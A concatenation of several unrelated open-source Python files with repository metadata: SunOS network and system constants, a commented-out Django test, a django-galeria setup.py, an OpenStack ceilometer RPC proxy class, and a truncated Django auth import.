FTT_ALIGN = 5
FTT_DFAULT = 6
FSR_FTT_SHIFT = 14
FSR_FTT_IEEE = (FTT_IEEE << FSR_FTT_SHIFT)
FSR_FTT_UNFIN = (FTT_UNFIN << FSR_FTT_SHIFT)
FSR_FTT_UNIMP = (FTT_UNIMP << FSR_FTT_SHIFT)
FSR_FTT_SEQ = (FTT_SEQ << FSR_FTT_SHIFT)
FSR_FTT_ALIGN = (FTT_ALIGN << FSR_FTT_SHIFT)
FSR_FTT_DFAULT = (FTT_DFAULT << FSR_FTT_SHIFT)
FSR_TEM_NX = (0x1 << 23)
FSR_TEM_DZ = (0x2 << 23)
FSR_TEM_UF = (0x4 << 23)
FSR_TEM_OF = (0x8 << 23)
FSR_TEM_NV = (0x10 << 23)
RP_DBLEXT = 0
RP_SINGLE = 1
RP_DOUBLE = 2
RP_RESERVED = 3
RD_NEAR = 0
RD_ZER0 = 1
RD_POSINF = 2
RD_NEGINF = 3
FPRS_DL = 0x1
FPRS_DU = 0x2
FPRS_FEF = 0x4
PIL_MAX = 0xf
def SAVE_GLOBALS(RP): return \
def RESTORE_GLOBALS(RP): return \
def SAVE_OUTS(RP): return \
def RESTORE_OUTS(RP): return \
def SAVE_WINDOW(SBP): return \
def RESTORE_WINDOW(SBP): return \
def STORE_FPREGS(FP): return \
def LOAD_FPREGS(FP): return \
_SPARC_MAXREGWINDOW = 31
_XRS_ID = 0x78727300
GETCONTEXT = 0
SETCONTEXT = 1
UC_SIGMASK = 001
UC_STACK = 002
UC_CPU = 004
UC_MAU = 010
UC_FPU = UC_MAU
UC_INTR = 020
UC_ASR = 040
UC_MCONTEXT = (UC_CPU|UC_FPU|UC_ASR)
UC_ALL = (UC_SIGMASK|UC_STACK|UC_MCONTEXT)
_SIGQUEUE_MAX = 32
_SIGNOTIFY_MAX = 32
# Included from sys/pcb.h
INSTR_VALID = 0x02
NORMAL_STEP = 0x04
WATCH_STEP = 0x08
CPC_OVERFLOW = 0x10
ASYNC_HWERR = 0x20
STEP_NONE = 0
STEP_REQUESTED = 1
STEP_ACTIVE = 2
STEP_WASACTIVE = 3
# Included from sys/msacct.h
LMS_USER = 0
LMS_SYSTEM = 1
LMS_TRAP = 2
LMS_TFAULT = 3
LMS_DFAULT = 4
LMS_KFAULT = 5
LMS_USER_LOCK = 6
LMS_SLEEP = 7
LMS_WAIT_CPU = 8
LMS_STOPPED = 9
NMSTATES = 10
# Included from sys/lwp.h
# Included from sys/synch.h
from TYPES import *
USYNC_THREAD = 0x00
USYNC_PROCESS = 0x01
LOCK_NORMAL = 0x00
LOCK_ERRORCHECK = 0x02
LOCK_RECURSIVE = 0x04
USYNC_PROCESS_ROBUST = 0x08
LOCK_PRIO_NONE = 0x00
LOCK_PRIO_INHERIT = 0x10
LOCK_PRIO_PROTECT = 0x20
LOCK_STALL_NP = 0x00
LOCK_ROBUST_NP = 0x40
LOCK_OWNERDEAD = 0x1
LOCK_NOTRECOVERABLE = 0x2
LOCK_INITED = 0x4
LOCK_UNMAPPED = 0x8
LWP_DETACHED = 0x00000040
LWP_SUSPENDED = 0x00000080
__LWP_ASLWP = 0x00000100
MAXSYSARGS = 8
NORMALRETURN = 0
JUSTRETURN = 1
LWP_USER = 0x01
LWP_SYS = 0x02
TS_FREE = 0x00
TS_SLEEP = 0x01
TS_RUN = 0x02
TS_ONPROC = 0x04
TS_ZOMB = 0x08
TS_STOPPED = 0x10
T_INTR_THREAD = 0x0001
T_WAKEABLE = 0x0002
T_TOMASK = 0x0004
T_TALLOCSTK = 0x0008
T_WOULDBLOCK = 0x0020
T_DONTBLOCK = 0x0040
T_DONTPEND = 0x0080
T_SYS_PROF = 0x0100
T_WAITCVSEM = 0x0200
T_WATCHPT = 0x0400
T_PANIC = 0x0800
TP_HOLDLWP = 0x0002
TP_TWAIT = 0x0004
TP_LWPEXIT = 0x0008
TP_PRSTOP = 0x0010
TP_CHKPT = 0x0020
TP_EXITLWP = 0x0040
TP_PRVSTOP = 0x0080
TP_MSACCT = 0x0100
TP_STOPPING = 0x0200
TP_WATCHPT = 0x0400
TP_PAUSE = 0x0800
TP_CHANGEBIND = 0x1000
TS_LOAD = 0x0001
TS_DONT_SWAP = 0x0002
TS_SWAPENQ = 0x0004
TS_ON_SWAPQ = 0x0008
TS_CSTART = 0x0100
TS_UNPAUSE = 0x0200
TS_XSTART = 0x0400
TS_PSTART = 0x0800
TS_RESUME = 0x1000
TS_CREATE = 0x2000
TS_ALLSTART = \
(TS_CSTART|TS_UNPAUSE|TS_XSTART|TS_PSTART|TS_RESUME|TS_CREATE)
def CPR_VSTOPPED(t): return \
def THREAD_TRANSITION(tp): return thread_transition(tp);
def THREAD_STOP(tp): return \
def THREAD_ZOMB(tp): return THREAD_SET_STATE(tp, TS_ZOMB, NULL)
def SEMA_HELD(x): return (sema_held((x)))
NO_LOCKS_HELD = 1
NO_COMPETING_THREADS = 1
# Included from sys/cred.h
# Included from sys/uio.h
from TYPES import *
# Included from sys/resource.h
from TYPES import *
PRIO_PROCESS = 0
PRIO_PGRP = 1
PRIO_USER = 2
RLIMIT_CPU = 0
RLIMIT_FSIZE = 1
RLIMIT_DATA = 2
RLIMIT_STACK = 3
RLIMIT_CORE = 4
RLIMIT_NOFILE = 5
RLIMIT_VMEM = 6
RLIMIT_AS = RLIMIT_VMEM
RLIM_NLIMITS = 7
RLIM_INFINITY = (-3l)
RLIM_SAVED_MAX = (-2l)
RLIM_SAVED_CUR = (-1l)
RLIM_INFINITY = 0x7fffffff
RLIM_SAVED_MAX = 0x7ffffffe
RLIM_SAVED_CUR = 0x7ffffffd
RLIM32_INFINITY = 0x7fffffff
RLIM32_SAVED_MAX = 0x7ffffffe
RLIM32_SAVED_CUR = 0x7ffffffd
# Included from sys/model.h
# Included from sys/debug.h
def ASSERT64(x): return ASSERT(x)
def ASSERT32(x): return ASSERT(x)
DATAMODEL_MASK = 0x0FF00000
DATAMODEL_ILP32 = 0x00100000
DATAMODEL_LP64 = 0x00200000
DATAMODEL_NONE = 0
DATAMODEL_NATIVE = DATAMODEL_LP64
DATAMODEL_NATIVE = DATAMODEL_ILP32
def STRUCT_SIZE(handle): return \
def STRUCT_BUF(handle): return ((handle).ptr.m64)
def SIZEOF_PTR(umodel): return \
def STRUCT_SIZE(handle): return (sizeof (*(handle).ptr))
def STRUCT_BUF(handle): return ((handle).ptr)
def SIZEOF_PTR(umodel): return sizeof (caddr_t)
def lwp_getdatamodel(t): return DATAMODEL_ILP32
RUSAGE_SELF = 0
RUSAGE_CHILDREN = -1
# Included from vm/seg_enum.h
# Included from sys/buf.h
# Included from sys/kstat.h
from TYPES import *
KSTAT_STRLEN = 31
def KSTAT_ENTER(k): return \
def KSTAT_EXIT(k): return \
KSTAT_TYPE_RAW = 0
KSTAT_TYPE_NAMED = 1
KSTAT_TYPE_INTR = 2
KSTAT_TYPE_IO = 3
KSTAT_TYPE_TIMER = 4
KSTAT_NUM_TYPES = 5
KSTAT_FLAG_VIRTUAL = 0x01
KSTAT_FLAG_VAR_SIZE = 0x02
KSTAT_FLAG_WRITABLE = 0x04
KSTAT_FLAG_PERSISTENT = 0x08
KSTAT_FLAG_DORMANT = 0x10
KSTAT_FLAG_INVALID = 0x20
KSTAT_READ = 0
KSTAT_WRITE = 1
KSTAT_DATA_CHAR = 0
KSTAT_DATA_INT32 = 1
KSTAT_DATA_UINT32 = 2
KSTAT_DATA_INT64 = 3
KSTAT_DATA_UINT64 = 4
KSTAT_DATA_LONG = KSTAT_DATA_INT32
KSTAT_DATA_ULONG = KSTAT_DATA_UINT32
KSTAT_DATA_LONG = KSTAT_DATA_INT64
KSTAT_DATA_ULONG = KSTAT_DATA_UINT64
KSTAT_DATA_LONG = 7
KSTAT_DATA_ULONG = 8
KSTAT_DATA_LONGLONG = KSTAT_DATA_INT64
KSTAT_DATA_ULONGLONG = KSTAT_DATA_UINT64
KSTAT_DATA_FLOAT = 5
KSTAT_DATA_DOUBLE = 6
KSTAT_INTR_HARD = 0
KSTAT_INTR_SOFT = 1
KSTAT_INTR_WATCHDOG = 2
KSTAT_INTR_SPURIOUS = 3
KSTAT_INTR_MULTSVC = 4
KSTAT_NUM_INTRS = 5
B_BUSY = 0x0001
B_DONE = 0x0002
B_ERROR = 0x0004
B_PAGEIO = 0x0010
B_PHYS = 0x0020
B_READ = 0x0040
B_WRITE = 0x0100
B_KERNBUF = 0x0008
B_WANTED = 0x0080
B_AGE = 0x000200
B_ASYNC = 0x000400
B_DELWRI = 0x000800
B_STALE = 0x001000
B_DONTNEED = 0x002000
B_REMAPPED = 0x004000
B_FREE = 0x008000
B_INVAL = 0x010000
B_FORCE = 0x020000
B_HEAD = 0x040000
B_NOCACHE = 0x080000
B_TRUNC = 0x100000
B_SHADOW = 0x200000
B_RETRYWRI = 0x400000
def notavail(bp): return \
def BWRITE(bp): return \
def BWRITE2(bp): return \
VROOT = 0x01
VNOCACHE = 0x02
VNOMAP = 0x04
VDUP = 0x08
VNOSWAP = 0x10
VNOMOUNT = 0x20
VISSWAP = 0x40
VSWAPLIKE = 0x80
VVFSLOCK = 0x100
VVFSWAIT = 0x200
VVMLOCK = 0x400
VDIROPEN = 0x800
VVMEXEC = 0x1000
VPXFS = 0x2000
AT_TYPE = 0x0001
AT_MODE = 0x0002
AT_UID = 0x0004
AT_GID = 0x0008
AT_FSID = 0x0010
AT_NODEID = 0x0020
AT_NLINK = 0x0040
AT_SIZE = 0x0080
AT_ATIME = 0x0100
AT_MTIME = 0x0200
AT_CTIME = 0x0400
AT_RDEV = 0x0800
AT_BLKSIZE = 0x1000
AT_NBLOCKS = 0x2000
AT_VCODE = 0x4000
AT_ALL = (AT_TYPE|AT_MODE|AT_UID|AT_GID|AT_FSID|AT_NODEID|\
AT_NLINK|AT_SIZE|AT_ATIME|AT_MTIME|AT_CTIME|\
AT_RDEV|AT_BLKSIZE|AT_NBLOCKS|AT_VCODE)
AT_STAT = (AT_MODE|AT_UID|AT_GID|AT_FSID|AT_NODEID|AT_NLINK|\
AT_SIZE|AT_ATIME|AT_MTIME|AT_CTIME|AT_RDEV)
AT_TIMES = (AT_ATIME|AT_MTIME|AT_CTIME)
AT_NOSET = (AT_NLINK|AT_RDEV|AT_FSID|AT_NODEID|AT_TYPE|\
AT_BLKSIZE|AT_NBLOCKS|AT_VCODE)
VSUID = 04000
VSGID = 02000
VSVTX = 01000
VREAD = 00400
VWRITE = 00200
VEXEC = 00100
MODEMASK = 07777
PERMMASK = 00777
def MANDMODE(mode): return (((mode) & (VSGID|(VEXEC>>3))) == VSGID)
VSA_ACL = 0x0001
VSA_ACLCNT = 0x0002
VSA_DFACL = 0x0004
VSA_DFACLCNT = 0x0008
LOOKUP_DIR = 0x01
DUMP_ALLOC = 0
DUMP_FREE = 1
DUMP_SCAN = 2
ATTR_UTIME = 0x01
ATTR_EXEC = 0x02
ATTR_COMM = 0x04
ATTR_HINT = 0x08
ATTR_REAL = 0x10
# Included from sys/poll.h
POLLIN = 0x0001
POLLPRI = 0x0002
POLLOUT = 0x0004
POLLRDNORM = 0x0040
POLLWRNORM = POLLOUT
POLLRDBAND = 0x0080
POLLWRBAND = 0x0100
POLLNORM = POLLRDNORM
POLLERR = 0x0008
POLLHUP = 0x0010
POLLNVAL = 0x0020
POLLREMOVE = 0x0800
POLLRDDATA = 0x0200
POLLNOERR = 0x0400
POLLCLOSED = 0x8000
# Included from sys/strmdep.h
def str_aligned(X): return (((ulong_t)(X) & (sizeof (long) - 1)) == 0)
# Included from sys/strft.h
tdelta_t_sz = 12
FTEV_MASK = 0x1FFF
FTEV_ISWR = 0x8000
FTEV_CS = 0x4000
FTEV_PS = 0x2000
FTEV_QMASK = 0x1F00
FTEV_ALLOCMASK = 0x1FF8
FTEV_ALLOCB = 0x0000
FTEV_ESBALLOC = 0x0001
FTEV_DESBALLOC = 0x0002
FTEV_ESBALLOCA = 0x0003
FTEV_DESBALLOCA = 0x0004
FTEV_ALLOCBIG = 0x0005
FTEV_ALLOCBW = 0x0006
FTEV_FREEB = 0x0008
FTEV_DUPB = 0x0009
FTEV_COPYB = 0x000A
FTEV_CALLER = 0x000F
FTEV_PUT = 0x0100
FTEV_FSYNCQ = 0x0103
FTEV_DSYNCQ = 0x0104
FTEV_PUTQ = 0x0105
FTEV_GETQ = 0x0106
FTEV_RMVQ = 0x0107
FTEV_INSQ = 0x0108
FTEV_PUTBQ = 0x0109
FTEV_FLUSHQ = 0x010A
FTEV_REPLYQ = 0x010B
FTEV_PUTNEXT = 0x010D
FTEV_RWNEXT = 0x010E
FTEV_QWINNER = 0x010F
FTEV_GEWRITE = 0x0101
def FTFLW_HASH(h): return (((unsigned)(h))%ftflw_hash_sz)
FTBLK_EVNTS = 0x9
QENAB = 0x00000001
QWANTR = 0x00000002
QWANTW = 0x00000004
QFULL = 0x00000008
QREADR = 0x00000010
QUSE = 0x00000020
QNOENB = 0x00000040
QBACK = 0x00000100
QHLIST = 0x00000200
QPAIR = 0x00000800
QPERQ = 0x00001000
QPERMOD = 0x00002000
QMTSAFE = 0x00004000
QMTOUTPERIM = 0x00008000
QMT_TYPEMASK = (QPAIR|QPERQ|QPERMOD|QMTSAFE|QMTOUTPERIM)
QINSERVICE = 0x00010000
QWCLOSE = 0x00020000
QEND = 0x00040000
QWANTWSYNC = 0x00080000
QSYNCSTR = 0x00100000
QISDRV = 0x00200000
QHOT = 0x00400000
QNEXTHOT = 0x00800000
_QINSERTING = 0x04000000
_QREMOVING = 0x08000000
Q_SQQUEUED = 0x01
Q_SQDRAINING = 0x02
QB_FULL = 0x01
QB_WANTW = 0x02
QB_BACK = 0x04
NBAND = 256
STRUIOT_NONE = -1
STRUIOT_DONTCARE = 0
STRUIOT_STANDARD = 1
STRUIOT_IP = 2
DBLK_REFMIN = 0x01
STRUIO_SPEC = 0x01
STRUIO_DONE = 0x02
STRUIO_IP = 0x04
STRUIO_ZC = 0x08
STRUIO_ICK = 0x10
MSGMARK = 0x01
MSGNOLOOP = 0x02
MSGDELIM = 0x04
MSGNOGET = 0x08
MSGMARKNEXT = 0x10
MSGNOTMARKNEXT = 0x20
M_DATA = 0x00
M_PROTO = 0x01
M_BREAK = 0x08
M_PASSFP = 0x09
M_EVENT = 0x0a
M_SIG = 0x0b
M_DELAY = 0x0c
M_CTL = 0x0d
M_IOCTL = 0x0e
M_SETOPTS = 0x10
M_RSE = 0x11
M_IOCACK = 0x81
M_IOCNAK = 0x82
M_PCPROTO = 0x83
M_PCSIG = 0x84
M_READ = 0x85
M_FLUSH = 0x86
M_STOP = 0x87
M_START = 0x88
M_HANGUP = 0x89
M_ERROR = 0x8a
M_COPYIN = 0x8b
M_COPYOUT = 0x8c
M_IOCDATA = 0x8d
M_PCRSE = 0x8e
M_STOPI = 0x8f
M_STARTI = 0x90
M_PCEVENT = 0x91
M_UNHANGUP = 0x92
QNORM = 0x00
QPCTL = 0x80
IOC_MODELS = DATAMODEL_MASK
IOC_ILP32 = DATAMODEL_ILP32
IOC_LP64 = DATAMODEL_LP64
IOC_NATIVE = DATAMODEL_NATIVE
IOC_NONE = DATAMODEL_NONE
STRCANON = 0x01
RECOPY = 0x02
SO_ALL = 0x003f
SO_READOPT = 0x0001
SO_WROFF = 0x0002
SO_MINPSZ = 0x0004
SO_MAXPSZ = 0x0008
SO_HIWAT = 0x0010
SO_LOWAT = 0x0020
SO_MREADON = 0x0040
SO_MREADOFF = 0x0080
SO_NDELON = 0x0100
SO_NDELOFF = 0x0200
SO_ISTTY = 0x0400
SO_ISNTTY = 0x0800
SO_TOSTOP = 0x1000
SO_TONSTOP = 0x2000
SO_BAND = 0x4000
SO_DELIM = 0x8000
SO_NODELIM = 0x010000
SO_STRHOLD = 0x020000
SO_ERROPT = 0x040000
SO_COPYOPT = 0x080000
SO_MAXBLK = 0x100000
DEF_IOV_MAX = 16
INFOD_FIRSTBYTES = 0x02
INFOD_BYTES = 0x04
INFOD_COUNT = 0x08
INFOD_COPYOUT = 0x10
MODOPEN = 0x1
CLONEOPEN = 0x2
CONSOPEN = 0x4
OPENFAIL = -1
BPRI_LO = 1
BPRI_MED = 2
BPRI_HI = 3
BPRI_FT = 4
INFPSZ = -1
FLUSHALL = 1
FLUSHDATA = 0
STRHIGH = 5120
STRLOW = 1024
MAXIOCBSZ = 1024
PERIM_INNER = 1
PERIM_OUTER = 2
def datamsg(type): return \
def straln(a): return (caddr_t)((intptr_t)(a) & ~(sizeof (int)-1))
# Included from sys/byteorder.h
def ntohl(x): return (x)
def ntohs(x): return (x)
def htonl(x): return (x)
def htons(x): return (x)
IPPROTO_IP = 0
IPPROTO_HOPOPTS = 0
IPPROTO_ICMP = 1
IPPROTO_IGMP = 2
IPPROTO_GGP = 3
IPPROTO_ENCAP = 4
IPPROTO_TCP = 6
IPPROTO_EGP = 8
IPPROTO_PUP = 12
IPPROTO_UDP = 17
IPPROTO_IDP = 22
IPPROTO_IPV6 = 41
IPPROTO_ROUTING = 43
IPPROTO_FRAGMENT = 44
IPPROTO_RSVP = 46
IPPROTO_ESP = 50
IPPROTO_AH = 51
IPPROTO_ICMPV6 = 58
IPPROTO_NONE = 59
IPPROTO_DSTOPTS = 60
IPPROTO_HELLO = 63
IPPROTO_ND = 77
IPPROTO_EON = 80
IPPROTO_PIM = 103
IPPROTO_RAW = 255
IPPROTO_MAX = 256
IPPORT_ECHO = 7
IPPORT_DISCARD = 9
IPPORT_SYSTAT = 11
IPPORT_DAYTIME = 13
IPPORT_NETSTAT = 15
IPPORT_FTP = 21
IPPORT_TELNET = 23
IPPORT_SMTP = 25
IPPORT_TIMESERVER = 37
IPPORT_NAMESERVER = 42
IPPORT_WHOIS = 43
IPPORT_MTP = 57
IPPORT_BOOTPS = 67
IPPORT_BOOTPC = 68
IPPORT_TFTP = 69
IPPORT_RJE = 77
IPPORT_FINGER = 79
IPPORT_TTYLINK = 87
IPPORT_SUPDUP = 95
IPPORT_EXECSERVER = 512
IPPORT_LOGINSERVER = 513
IPPORT_CMDSERVER = 514
IPPORT_EFSSERVER = 520
IPPORT_BIFFUDP = 512
IPPORT_WHOSERVER = 513
IPPORT_ROUTESERVER = 520
IPPORT_RESERVED = 1024
IPPORT_USERRESERVED = 5000
IMPLINK_IP = 155
IMPLINK_LOWEXPER = 156
IMPLINK_HIGHEXPER = 158
IN_CLASSA_NSHIFT = 24
IN_CLASSA_MAX = 128
IN_CLASSB_NSHIFT = 16
IN_CLASSB_MAX = 65536
IN_CLASSC_NSHIFT = 8
IN_CLASSD_NSHIFT = 28
def IN_MULTICAST(i): return IN_CLASSD(i)
IN_LOOPBACKNET = 127
def IN_SET_LOOPBACK_ADDR(a): return \
def IN6_IS_ADDR_UNSPECIFIED(addr): return \
def IN6_IS_ADDR_LOOPBACK(addr): return \
def IN6_IS_ADDR_LOOPBACK(addr): return \
def IN6_IS_ADDR_MULTICAST(addr): return \
def IN6_IS_ADDR_MULTICAST(addr): return \
def IN6_IS_ADDR_LINKLOCAL(addr): return \
def IN6_IS_ADDR_LINKLOCAL(addr): return \
def IN6_IS_ADDR_SITELOCAL(addr): return \
def IN6_IS_ADDR_SITELOCAL(addr): return \
def IN6_IS_ADDR_V4MAPPED(addr): return \
def IN6_IS_ADDR_V4MAPPED(addr): return \
def IN6_IS_ADDR_V4MAPPED_ANY(addr): return \
def IN6_IS_ADDR_V4MAPPED_ANY(addr): return \
def IN6_IS_ADDR_V4COMPAT(addr): return \
def IN6_IS_ADDR_V4COMPAT(addr): return \
def IN6_IS_ADDR_MC_RESERVED(addr): return \
def IN6_IS_ADDR_MC_RESERVED(addr): return \
def IN6_IS_ADDR_MC_NODELOCAL(addr): return \
def IN6_IS_ADDR_MC_NODELOCAL(addr): return \
def IN6_IS_ADDR_MC_LINKLOCAL(addr): return \
def IN6_IS_ADDR_MC_LINKLOCAL(addr): return \
def IN6_IS_ADDR_MC_SITELOCAL(addr): return \
def IN6_IS_ADDR_MC_SITELOCAL(addr): return \
def IN6_IS_ADDR_MC_ORGLOCAL(addr): return \
def IN6_IS_ADDR_MC_ORGLOCAL(addr): return \
def IN6_IS_ADDR_MC_GLOBAL(addr): return \
def IN6_IS_ADDR_MC_GLOBAL(addr): return \
IP_OPTIONS = 1
IP_HDRINCL = 2
IP_TOS = 3
IP_TTL = 4
IP_RECVOPTS = 5
IP_RECVRETOPTS = 6
IP_RECVDSTADDR = 7
IP_RETOPTS = 8
IP_MULTICAST_IF = 0x10
IP_MULTICAST_TTL = 0x11
IP_MULTICAST_LOOP = 0x12
IP_ADD_MEMBERSHIP = 0x13
IP_DROP_MEMBERSHIP = 0x14
IP_SEC_OPT = 0x22
IPSEC_PREF_NEVER = 0x01
IPSEC_PREF_REQUIRED = 0x02
IPSEC_PREF_UNIQUE = 0x04
IP_ADD_PROXY_ADDR = 0x40
IP_BOUND_IF = 0x41
IP_UNSPEC_SRC = 0x42
IP_REUSEADDR = 0x104
IP_DONTROUTE = 0x105
IP_BROADCAST = 0x106
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IPV6_RTHDR_TYPE_0 = 0
IPV6_UNICAST_HOPS = 0x5
IPV6_MULTICAST_IF = 0x6
IPV6_MULTICAST_HOPS = 0x7
IPV6_MULTICAST_LOOP = 0x8
IPV6_JOIN_GROUP = 0x9
IPV6_LEAVE_GROUP = 0xa
IPV6_ADD_MEMBERSHIP = 0x9
IPV6_DROP_MEMBERSHIP = 0xa
IPV6_PKTINFO = 0xb
IPV6_HOPLIMIT = 0xc
IPV6_NEXTHOP = 0xd
IPV6_HOPOPTS = 0xe
IPV6_DSTOPTS = 0xf
IPV6_RTHDR = 0x10
IPV6_RTHDRDSTOPTS = 0x11
IPV6_RECVPKTINFO = 0x12
IPV6_RECVHOPLIMIT = 0x13
IPV6_RECVHOPOPTS = 0x14
IPV6_RECVDSTOPTS = 0x15
IPV6_RECVRTHDR = 0x16
IPV6_RECVRTHDRDSTOPTS = 0x17
IPV6_CHECKSUM = 0x18
IPV6_BOUND_IF = 0x41
IPV6_UNSPEC_SRC = 0x42
INET_ADDRSTRLEN = 16
INET6_ADDRSTRLEN = 46
IPV6_PAD1_OPT = 0
|
xbmc/xbmc-antiquated
|
xbmc/lib/libPython/Python/Lib/plat-sunos5/IN.py
|
Python
|
gpl-2.0
| 28,151 | 0.005044 |
# from test_plus.test import TestCase
#
#
# class TestUser(TestCase):
#
# def setUp(self):
# self.user = self.make_user()
#
# def test__str__(self):
# self.assertEqual(
# self.user.__str__(),
# 'testuser' # This is the default username for self.make_user()
# )
#
# def test_get_absolute_url(self):
# self.assertEqual(
# self.user.get_absolute_url(),
# '/users/testuser/'
# )
|
Alex-Just/gymlog
|
gymlog/main/tests/test_models.py
|
Python
|
mit
| 476 | 0 |
#/usr/bin/env python
import codecs
import os
import sys
from setuptools import setup, find_packages
if 'publish' in sys.argv:
os.system('python setup.py sdist upload')
sys.exit()
read = lambda filepath: codecs.open(filepath, 'r', 'utf-8').read()
# Dynamically calculate the version based on galeria.VERSION.
version = __import__('galeria').get_version()
setup(
name='django-galeria',
version=version,
description='Pluggable gallery/portfolio application for Django projects',
long_description=read(os.path.join(os.path.dirname(__file__), 'README.rst')),
author='Guilherme Gondim',
author_email='[email protected]',
maintainer='Guilherme Gondim',
maintainer_email='[email protected]',
license='BSD License',
url='https://bitbucket.org/semente/django-galeria/',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=['django-mptt']
)
|
zokeber/django-galeria
|
setup.py
|
Python
|
bsd-3-clause
| 1,378 | 0.002177 |
# Copyright 2012-2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A helper class for proxy objects to remote APIs.
For more information about rpc API version numbers, see:
rpc/dispatcher.py
"""
from ceilometer.openstack.common import rpc
from ceilometer.openstack.common.rpc import common as rpc_common
from ceilometer.openstack.common.rpc import serializer as rpc_serializer
class RpcProxy(object):
"""A helper class for rpc clients.
This class is a wrapper around the RPC client API. It allows you to
specify the topic and API version in a single place. This is intended to
be used as a base class for a class that implements the client side of an
rpc API.
"""
# The default namespace, which can be overridden in a subclass.
RPC_API_NAMESPACE = None
def __init__(self, topic, default_version, version_cap=None,
serializer=None):
"""Initialize an RpcProxy.
:param topic: The topic to use for all messages.
:param default_version: The default API version to request in all
outgoing messages. This can be overridden on a per-message
basis.
:param version_cap: Optionally cap the maximum version used for sent
messages.
:param serializer: Optionaly (de-)serialize entities with a
provided helper.
"""
self.topic = topic
self.default_version = default_version
self.version_cap = version_cap
if serializer is None:
serializer = rpc_serializer.NoOpSerializer()
self.serializer = serializer
super(RpcProxy, self).__init__()
def _set_version(self, msg, vers):
"""Helper method to set the version in a message.
:param msg: The message having a version added to it.
:param vers: The version number to add to the message.
"""
v = vers if vers else self.default_version
if (self.version_cap and not
rpc_common.version_is_compatible(self.version_cap, v)):
raise rpc_common.RpcVersionCapError(version_cap=self.version_cap)
msg['version'] = v
def _get_topic(self, topic):
"""Return the topic to use for a message."""
return topic if topic else self.topic
def can_send_version(self, version):
"""Check to see if a version is compatible with the version cap."""
return (not self.version_cap or
rpc_common.version_is_compatible(self.version_cap, version))
@staticmethod
def make_namespaced_msg(method, namespace, **kwargs):
return {'method': method, 'namespace': namespace, 'args': kwargs}
def make_msg(self, method, **kwargs):
return self.make_namespaced_msg(method, self.RPC_API_NAMESPACE,
**kwargs)
def _serialize_msg_args(self, context, kwargs):
"""Helper method called to serialize message arguments.
This calls our serializer on each argument, returning a new
set of args that have been serialized.
:param context: The request context
:param kwargs: The arguments to serialize
:returns: A new set of serialized arguments
"""
new_kwargs = dict()
for argname, arg in kwargs.iteritems():
new_kwargs[argname] = self.serializer.serialize_entity(context,
arg)
return new_kwargs
def call(self, context, msg, topic=None, version=None, timeout=None):
"""rpc.call() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:param timeout: (Optional) A timeout to use when waiting for the
response. If no timeout is specified, a default timeout will be
used that is usually sufficient.
:returns: The return value from the remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
real_topic = self._get_topic(topic)
try:
result = rpc.call(context, real_topic, msg, timeout)
return self.serializer.deserialize_entity(context, result)
except rpc.common.Timeout as exc:
raise rpc.common.Timeout(
exc.info, real_topic, msg.get('method'))
def multicall(self, context, msg, topic=None, version=None, timeout=None):
"""rpc.multicall() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:param timeout: (Optional) A timeout to use when waiting for the
response. If no timeout is specified, a default timeout will be
used that is usually sufficient.
:returns: An iterator that lets you process each of the returned values
from the remote method as they arrive.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
real_topic = self._get_topic(topic)
try:
result = rpc.multicall(context, real_topic, msg, timeout)
return self.serializer.deserialize_entity(context, result)
except rpc.common.Timeout as exc:
raise rpc.common.Timeout(
exc.info, real_topic, msg.get('method'))
def cast(self, context, msg, topic=None, version=None):
"""rpc.cast() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.cast() does not wait on any return value from the
remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.cast(context, self._get_topic(topic), msg)
def fanout_cast(self, context, msg, topic=None, version=None):
"""rpc.fanout_cast() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.fanout_cast() does not wait on any return value
from the remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.fanout_cast(context, self._get_topic(topic), msg)
def cast_to_server(self, context, server_params, msg, topic=None,
version=None):
"""rpc.cast_to_server() a remote method.
:param context: The request context
:param server_params: Server parameters. See rpc.cast_to_server() for
details.
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.cast_to_server() does not wait on any
return values.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.cast_to_server(context, server_params, self._get_topic(topic), msg)
def fanout_cast_to_server(self, context, server_params, msg, topic=None,
version=None):
"""rpc.fanout_cast_to_server() a remote method.
:param context: The request context
:param server_params: Server parameters. See rpc.cast_to_server() for
details.
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.fanout_cast_to_server() does not wait on any
return values.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.fanout_cast_to_server(context, server_params,
self._get_topic(topic), msg)
|
rackerlabs/instrumented-ceilometer
|
ceilometer/openstack/common/rpc/proxy.py
|
Python
|
apache-2.0
| 9,444 | 0 |
from __future__ import unicode_literals
from datetime import date
from django.contrib.auth import (
BACKEND_SESSION_KEY, SESSION_KEY, authenticate, get_user,
)
